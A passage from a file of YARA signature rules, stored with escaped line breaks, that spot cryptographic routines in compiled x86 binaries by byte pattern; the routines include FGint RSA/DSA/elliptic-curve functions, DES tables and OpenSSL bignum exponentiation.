F4 FB FF FF 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 F4 FB FF FF BA FF 00 00 00 E8 ?? ?? ?? ?? 8D 45 F8 E8 ?? ?? ?? ?? 8B 45 FC E8 ?? ?? ?? ?? 8B D8 85 DB 7E 2F BE 01 00 00 00 8D 45 F8 8B 55 FC 0F B6 54 32 FF 8B 94 95 F4 FB FF FF E8 ?? ?? ?? ?? 46 4B 75 E5 EB }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_ConvertHexStringToBase256String\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tversion = \"0.2\"\r\n\t\tdescription = \"FGint ConvertHexStringToBase256String\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 F0 53 56 33 C9 89 4D F0 89 55 F8 89 45 FC 8B 45 FC E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 F8 E8 ?? ?? ?? ?? 8B 45 FC E8 ?? ?? ?? ?? D1 F8 79 03 83 D0 00 85 C0 7E 5F 89 45 F4 BE 01 00 00 00 8B C6 03 C0 8B 55 FC 8A 54 02 FF 8B 4D FC 8A 44 01 FE 3C 3A 73 0A 8B D8 80 EB 30 C1 E3 04 EB 08 8B D8 80 EB 37 C1 E3 04 80 FA 3A 73 07 80 EA 30 0A DA EB 05 80 EA 37 0A DA 8D 45 F0 8B D3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_Base256StringToGInt\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint Base256StringToGInt\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 81 C4 F8 FB FF FF 53 56 57 33 C9 89 4D F8 8B FA 89 45 FC 8B 45 FC ?? ?? ?? ?? ?? B9 00 01 00 00 8D 85 F8 FB FF FF 8B 15 ?? ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 55 ?? ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 F8 ?? ?? ?? ?? ?? 8D 85 F8 FB FF FF BA FF 00 00 00 ?? ?? ?? ?? ?? 8B 45 FC ?? ?? ?? ?? ?? 8B D8 85 DB 7E 34 BE 01 00 00 00 8D 45 F8 8B 55 FC 0F B6 54 32 FF 8B 94 95 F8 FB FF FF ?? ?? ?? ?? ?? 46 4B 75 E5 EB 12 8D 45 F8 B9 01 00 00 00 BA 01 00 00 00 ?? ?? ?? ?? ?? 8B 45 F8 80 38 30 75 0F }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_FGIntToBase256String\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tversion = \"0.2\"\r\n\t\tdescription = \"FGint FGIntToBase256String\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 33 C9 51 51 51 51 53 56 8B F2 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8D 55 FC E8 ?? ?? ?? ?? EB 10 8D 45 FC 8B 4D FC BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 FC E8 ?? ?? ?? ?? 25 07 00 00 80 79 05 48 83 C8 F8 40 85 C0 75 D8 8B 45 FC E8 ?? ?? ?? ?? 8B D8 85 DB 79 03 83 C3 07 C1 FB 03 8B C6 E8 ?? ?? ?? ?? 85 DB 76 4B 8D 45 F4 50 B9 08 00 00 00 BA 01 00 00 00 8B 45 FC E8 ?? ?? ?? ?? 8B 55 F4 8D 45 FB E8 ?? ?? ?? ?? 8D 45 F0 8A 55 FB E8 ?? ?? ?? ?? 8B 55 F0 8B C6 E8 ?? ?? ?? ?? 8D 45 FC B9 08 00 00 00 BA 01 00 00 00 E8 ?? ?? ?? ?? 4B 75 B5 }\r\n\t\t$c1 = { 55 8B EC 33 C9 51 51 51 51 53 56 8B F2 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8D 55 FC E8 ?? ?? ?? ?? EB 10 8D 45 FC 8B 4D FC BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 FC E8 ?? ?? ?? ?? 25 07 00 00 80 79 05 48 83 C8 F8 40 85 C0 75 D8 8B 45 FC 85 C0 74 05 83 E8 04 8B 00 8B D8 85 DB 79 03 83 C3 07 C1 FB 03 8B C6 E8 ?? ?? ?? ?? 85 DB 76 4C 8D 45 F4 50 B9 08 00 00 00 BA 01 00 00 00 8B 45 FC E8 ?? ?? ?? ?? 8B 55 F4 8D 45 FB E8 ?? ?? ?? ?? 8D 45 F0 0F B6 55 FB E8 ?? ?? ?? ?? 8B 55 F0 8B C6 E8 ?? ?? ?? ?? 8D 45 FC B9 08 00 00 00 BA 01 00 00 00 E8 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule FGint_ConvertBase256StringToHexString\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint ConvertBase256StringToHexString\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 33 C9 51 51 51 51 51 51 53 56 57 8B F2 89 45 FC 8B 45 FC E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B C6 E8 ?? ?? ?? ?? 8B 45 FC E8 ?? ?? ?? ?? 8B F8 85 FF 0F 8E AB 00 00 00 C7 45 F8 01 00 00 00 8B 45 FC 8B 55 F8 8A 5C 10 FF 33 C0 8A C3 C1 E8 04 83 F8 0A 73 1E 8D 45 F4 33 D2 8A D3 C1 EA 04 83 C2 30 E8 ?? ?? ?? ?? 8B 55 F4 8B C6 E8 ?? ?? ?? ?? EB 1C 8D 45 F0 33 D2 8A D3 C1 EA 04 83 C2 37 E8 ?? ?? ?? ?? 8B 55 F0 8B C6 E8 ?? ?? ?? ?? 8B C3 24 0F 3C 0A 73 22 8D 45 EC 8B D3 80 E2 0F 81 E2 FF 00 00 00 83 C2 30 E8 ?? ?? ?? ?? 8B 55 EC 8B C6 E8 ?? ?? ?? ?? EB 20 8D 45 E8 8B D3 80 E2 0F 81 E2 FF 00 00 00 83 C2 37 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule FGint_PGPConvertBase256to64\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2016-08\"\r\n\t\tdescription = \"FGint PGPConvertBase256to64\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 81 C4 E8 FB FF FF 53 56 57 33 C9 89 8D E8 FB FF FF 89 4D F8 89 4D F4 89 4D F0 8B FA 89 45 FC B9 00 01 00 00 8D 85 EC FB FF FF 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 EC FB FF FF BA FF 00 00 00 E8 ?? ?? ?? ?? 8D 45 F8 E8 ?? ?? ?? ?? 8B 45 FC 8B 00 E8 ?? ?? ?? ?? 8B D8 85 DB 7E 22 BE 01 00 00 00 8D 45 F8 8B 55 FC 8B 12 0F B6 54 32 FF 8B 94 95 EC FB FF FF E8 ?? ?? ?? ?? 46 4B 75 E3 8B 45 F8 E8 ?? ?? ?? ?? B9 06 00 00 00 99 F7 F9 85 D2 75 0A 8D 45 F0 E8 ?? ?? ?? ?? EB 4B 8B 45 F8 E8 ?? ?? ?? ?? B9 06 00 00 00 99 F7 F9 83 FA 04 75 1C 8D 45 F8 BA 4C 33 40 00 E8 ?? ?? ?? ?? 8D 45 F0 BA 58 33 40 00 E8 ?? ?? ?? ?? EB 1A 8D 45 F8 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 F0 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C7 E8 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? B9 06 00 00 00 99 F7 F9 8B D8 85 DB 7E 57 8D 45 F4 50 B9 06 00 00 00 BA 01 00 00 00 8B 45 F8 E8 ?? ?? ?? ?? 8D 45 EC 8B 55 F4 E8 ?? ?? ?? ?? 8D 85 E8 FB FF FF 8B 55 EC 8A 92 ?? ?? ?? ?? E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule FGint_RSAEncrypt\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint RSAEncrypt\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 D0 53 56 57 33 DB 89 5D D0 89 5D DC 89 5D D8 89 5D D4 8B F9 89 55 F8 89 45 FC 8B 45 FC E8 ?? ?? ?? ?? 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 E0 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 DC 8B C7 E8 ?? ?? ?? ?? 8B 45 DC E8 ?? ?? ?? ?? 8B D8 8D 55 DC 8B 45 FC E8 ?? ?? ?? ?? 8D 45 DC 8B 4D DC BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F3 4E EB 10 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_RsaDecrypt\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"FGint RsaDecrypt\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 A0 53 56 57 33 DB 89 5D A0 89 5D A4 89 5D A8 89 5D B4 89 5D B0 89 5D AC 89 4D F8 8B FA 89 45 FC 8B 45 FC E8 ?? ?? ?? ?? 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 B8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_RSAVerify\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"FGint RSAVerify\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 E0 53 56 8B F1 89 55 F8 89 45 FC 8B 5D 0C 8B 45 FC E8 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 E8 8B 45 F8 E8 ?? ?? ?? ?? 8D 55 F0 8B 45 FC E8 ?? ?? ?? ?? 8D 4D E0 8B D3 8D 45 F0 E8 ?? ?? ?? ?? 8D 55 F0 8D 45 E0 E8 ?? ?? ?? ?? 8D 45 E0 50 8B CB 8B D6 8D 45 E8 E8 ?? ?? ?? ?? 8D 55 E8 8D 45 E0 E8 ?? ?? ?? ?? 8D 55 F0 8D 45 E8 E8 ?? ?? ?? ?? 3C 02 8B 45 08 0F 94 00 8D 45 E8 E8 ?? ?? ?? ?? 8D 45 F0 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? B9 03 00 00 00 E8 ?? ?? ?? ?? 8D 45 F8 BA 02 00 00 00 E8 ?? ?? ?? ?? C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_FindPrimeGoodCurveAndPoint\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tdescription = \"FGint FindPrimeGoodCurveAndPoint\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 F4 53 56 57 33 DB 89 5D F4 89 4D FC 8B FA 8B F0 33 C0 55 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_ECElGamalEncrypt\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2016-08\"\r\n\t\tdescription = \"FGint ECElGamalEncrypt\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 81 C4 3C FF FF FF 53 56 57 33 DB 89 5D D8 89 5D D4 89 5D D0 8B 75 10 8D 7D 8C A5 A5 A5 A5 A5 8B 75 14 8D 7D A0 A5 A5 A5 A5 A5 8B 75 18 8D 7D DC A5 A5 8B 75 1C 8D 7D E4 A5 A5 8B F1 8D 7D EC A5 A5 8B F2 8D 7D F4 A5 A5 89 45 FC 8B 45 FC E8 ?? ?? ?? ?? 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 DC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 A0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 8C 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 78 FF FF FF 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 64 FF FF FF 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 50 FF FF FF 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 3C FF FF FF 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 BC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 B4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 7D CF }\r\n\t\t$c1 = { 55 8B EC 83 C4 A8 53 56 57 33 DB 89 5D A8 89 5D AC 89 5D BC 89 5D B8 89 5D B4 89 4D F4 89 55 F8 89 45 FC 8B 75 0C 8B 45 FC E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 71 14 41 00 64 FF 30 64 89 20 8D 55 BC 8B C6 E8 ?? ?? ?? ?? 8B 45 BC E8 ?? ?? ?? ?? 8B D8 8D 55 BC 8B 45 FC E8 ?? ?? ?? ?? 8D 45 BC 8B 4D BC BA 8C 14 41 00 E8 ?? ?? ?? ?? 8B FB 4F EB 10 8D 45 BC 8B 4D BC BA 98 14 41 00 E8 ?? ?? ?? ?? 8B 45 BC }\r\n\tcondition:\r\n\t\t$c0 or $c1\r\n}\r\n\r\nrule FGint_ECAddPoints\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tdescription = \"FGint ECAddPoints\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 A8 53 56 57 8B 75 0C 8D 7D F0 A5 A5 8B F1 8D 7D F8 A5 A5 8B F2 8D 7D A8 A5 A5 A5 A5 A5 8B F0 8D 7D BC A5 A5 A5 A5 A5 8B 5D 08 8D 45 BC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 A8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 F8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D8 8B 15 ?? ?? ?? ?? E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_ECPointKMultiple\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tdescription = \"FGint ECPointKMultiple\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 BC 53 56 57 33 DB 89 5D E4 8B 75 0C 8D 7D E8 A5 A5 8B F1 8D 7D F0 A5 A5 8B F2 8D 7D F8 A5 A5 8B F0 8D 7D D0 A5 A5 A5 A5 A5 8B 5D 08 8D 45 D0 8B 15 ?? ?? ?? 00 E8 ?? ?? ?? ?? 8D 45 F8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 BC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_ECPointDestroy\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tdescription = \"FGint ECPointDestroy\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 53 8B D8 8B C3 E8 ?? ?? ?? ?? 8D 43 08 E8 ?? ?? ?? ?? 5B C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_DSAPrimeSearch\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2016-08\"\r\n\t\tdescription = \"FGint DSAPrimeSearch\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 DC 53 56 8B DA 8B F0 8D 45 F8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 4D F8 8B D6 8B C6 E8 ?? ?? ?? ?? 8D 4D E8 8B D6 8B C3 E8 ?? ?? ?? ?? 8D 55 F0 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D E0 8D 55 E8 8B C3 E8 ?? ?? ?? ?? 8D 45 E8 E8 ?? ?? ?? ?? 8D 4D E8 8D 55 F0 8D 45 E0 E8 ?? ?? ?? ?? 8D 45 E0 E8 ?? ?? ?? ?? 8D 45 F0 E8 ?? ?? ?? ?? 8B 45 EC 8B 40 04 83 E0 01 85 C0 75 18 8D 4D E0 8B D6 8D 45 E8 E8 ?? ?? ?? ?? 8D 55 E8 8D 45 E0 E8 ?? ?? ?? ?? 8B D3 8D 45 E8 E8 ?? ?? ?? ?? C6 45 DF 00 EB 26 8D 4D E8 8D 55 F8 8B C3 E8 ?? ?? ?? ?? 8B D3 8D 45 E8 E8 ?? ?? ?? ?? 8D 4D DF 8B C3 BA 05 00 00 00 E8 ?? ?? ?? ?? 80 7D DF 00 74 D4 8D 45 F8 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? B9 04 00 00 00 E8 ?? ?? ?? ?? C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_DSASign\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2016-08\"\r\n\t\tdescription = \"FGint DSASign\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 CC 53 56 57 89 4D FC 8B DA 8B F8 8B 75 14 8B 45 10 E8 ?? ?? ?? ?? 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 DC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 CC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 F4 50 8B CF 8B D6 8B 45 FC E8 ?? ?? ?? ?? 8D 4D D4 8B D3 8D 45 F4 E8 ?? ?? ?? ?? 8D 45 F4 E8 ?? ?? ?? ?? 8D 4D F4 8B D3 8B C6 E8 ?? ?? ?? ?? 8D 55 EC 8B 45 10 E8 ?? ?? ?? ?? 8D 45 E4 50 8B CB 8D 55 D4 8B 45 18 E8 ?? ?? ?? ?? 8D 4D DC 8D 55 E4 8D 45 EC E8 ?? ?? ?? ?? 8D 45 EC E8 ?? ?? ?? ?? 8D 45 E4 E8 ?? ?? ?? ?? 8D 45 CC 50 8B CB 8D 55 DC 8D 45 F4 E8 ?? ?? ?? ?? 8D 45 F4 E8 ?? ?? ?? ?? 8D 45 DC E8 ?? ?? ?? ?? 8B 55 0C 8D 45 D4 E8 ?? ?? ?? ?? 8B 55 08 8D 45 CC E8 ?? ?? ?? ?? 8D 45 D4 E8 ?? ?? ?? ?? 8D 45 CC E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 CC 8B 15 ?? ?? ?? ?? B9 06 00 00 00 E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_DSAVerify\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2016-08\"\r\n\t\tdescription = \"FGint DSAVerify\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 B4 53 56 57 89 4D FC 8B DA 8B F0 8B 7D 08 8B 45 14 E8 ?? ?? ?? ?? 8B 45 10 E8 ?? ?? ?? ?? 8B 45 0C E8 ?? ?? ?? ?? 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 DC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 CC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 BC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 B4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 CC 8B 45 0C E8 ?? ?? ?? ?? 8D 4D F4 8B D3 8D 45 CC E8 ?? ?? ?? ?? 8D 55 C4 8B 45 14 E8 ?? ?? ?? ?? 8D 45 EC 50 8B CB 8D 55 F4 8D 45 C4 E8 ?? ?? ?? ?? 8D 45 C4 E8 ?? ?? ?? ?? 8D 55 D4 8B 45 10 E8 ?? ?? ?? ?? 8D 45 E4 50 8B CB 8D 55 F4 8D 45 D4 E8 ?? ?? ?? ?? 8D 45 F4 E8 ?? ?? ?? ?? 8D 45 C4 50 8B CE 8D 55 EC 8B 45 FC E8 ?? ?? ?? ?? 8D 45 BC 50 8B CE 8D 55 E4 8B 45 18 E8 ?? ?? ?? ?? 8D 45 B4 50 8B CE 8D 55 BC 8D 45 C4 E8 ?? ?? ?? ?? 8D 45 C4 E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule DES_Long\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"DES [long]\"\r\n\tstrings:\r\n\t\t$c0 = { 10 80 10 40 00 00 00 00 00 80 10 00 00 00 10 40 10 00 00 40 10 80 00 00 00 80 00 40 00 80 10 00 00 80 00 00 10 00 10 40 10 00 00 00 00 80 00 40 10 00 10 00 00 80 10 40 00 00 10 40 10 00 00 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule DES_sbox\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"DES [sbox]\"\r\n\tstrings:\r\n\t\t$c0 = { 00 04 01 01 00 00 00 00 00 00 01 00 04 04 01 01 04 00 01 01 04 04 01 00 04 00 00 00 00 00 01 00 00 04 00 00 00 04 01 01 04 04 01 01 00 04 00 00 04 04 00 01 04 00 01 01 00 00 00 01 04 00 00 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule DES_pbox_long\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"DES [pbox] [long]\"\r\n\tstrings:\r\n\t\t$c0 = { 0F 00 00 00 06 00 00 00 13 00 00 00 14 00 00 00 1C 00 00 00 0B 00 00 00 1B 00 00 00 10 00 00 00 00 00 00 00 0E 00 00 00 16 00 00 00 19 00 00 00 04 00 00 00 11 00 00 00 1E 00 00 00 09 00 00 00 01 00 00 00 07 00 00 00 17 00 00 00 0D 00 00 00 1F 00 00 00 1A 00 00 00 02 00 00 00 08 00 00 00 12 00 00 00 0C 00 00 00 1D 00 00 00 05 00 00 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule OpenSSL_BN_mod_exp2_mont\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"OpenSSL BN_mod_exp2_mont\"\r\n\tstrings:\r\n\t\t$c0 = { B8 30 05 00 00 E8 ?? ?? ?? ?? 8B 84 24 48 05 00 00 53 33 DB 56 8B 08 57 89 5C 24 24 89 5C 24 30 8A 01 89 5C 24 28 A8 01 89 5C 24 0C 75 24 68 89 00 00 00 68 ?? ?? ?? ?? 6A 66 6A 76 6A 03 E8 ?? ?? ?? ?? 83 C4 14 33 C0 5F 5E 5B 81 C4 30 05 00 00 C3 8B 94 24 48 05 00 00 52 E8 ?? ?? ?? ?? 8B F0 8B 84 24 54 05 00 00 50 E8 ?? ?? ?? ?? 83 C4 08 3B F3 8B F8 75 20 3B FB 75 1C 8B 8C 24 40 05 00 00 6A 01 51 E8 ?? ?? ?? ?? 83 C4 08 5F 5E 5B 81 C4 30 05 00 00 C3 3B F7 89 74 24 18 7F 04 89 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule OpenSSL_BN_mod_exp_mont\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"OpenSSL BN_mod_exp_mont\"\r\n\tstrings:\r\n\t\t$c0 = { B8 A0 02 00 00 E8 ?? ?? ?? ?? 53 56 57 8B BC 24 BC 02 00 00 33 F6 8B 07 89 74 24 24 89 74 24 20 89 74 24 0C F6 00 01 75 24 68 72 01 00 00 68 ?? ?? ?? ?? 6A 66 6A 6D 6A 03 E8 ?? ?? ?? ?? 83 C4 14 33 C0 5F 5E 5B 81 C4 A0 02 00 00 C3 8B 8C 24 B8 02 00 00 51 E8 ?? ?? ?? ?? 8B D8 83 C4 04 3B DE 89 5C 24 18 75 1C 8B 94 24 B0 02 00 00 6A 01 52 E8 ?? ?? ?? ?? 83 C4 08 5F 5E 5B 81 C4 A0 02 00 00 C3 55 8B AC 24 C4 02 00 00 55 E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 8B F0 55 89 74 24 24 E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule OpenSSL_BN_mod_exp_recp\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"OpenSSL BN_mod_exp_recp\"\r\n\tstrings:\r\n\t\t$c0 = { B8 C8 02 00 00 E8 ?? ?? ?? ?? 8B 84 24 D4 02 00 00 55 56 33 F6 50 89 74 24 1C 89 74 24 18 E8 ?? ?? ?? ?? 8B E8 83 C4 04 3B EE 89 6C 24 0C 75 1B 8B 8C 24 D4 02 00 00 6A 01 51 E8 ?? ?? ?? ?? 83 C4 08 5E 5D 81 C4 C8 02 00 00 C3 53 57 8B BC 24 EC 02 00 00 57 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B D8 83 C4 08 3B DE 0F 84 E7 02 00 00 8D 54 24 24 52 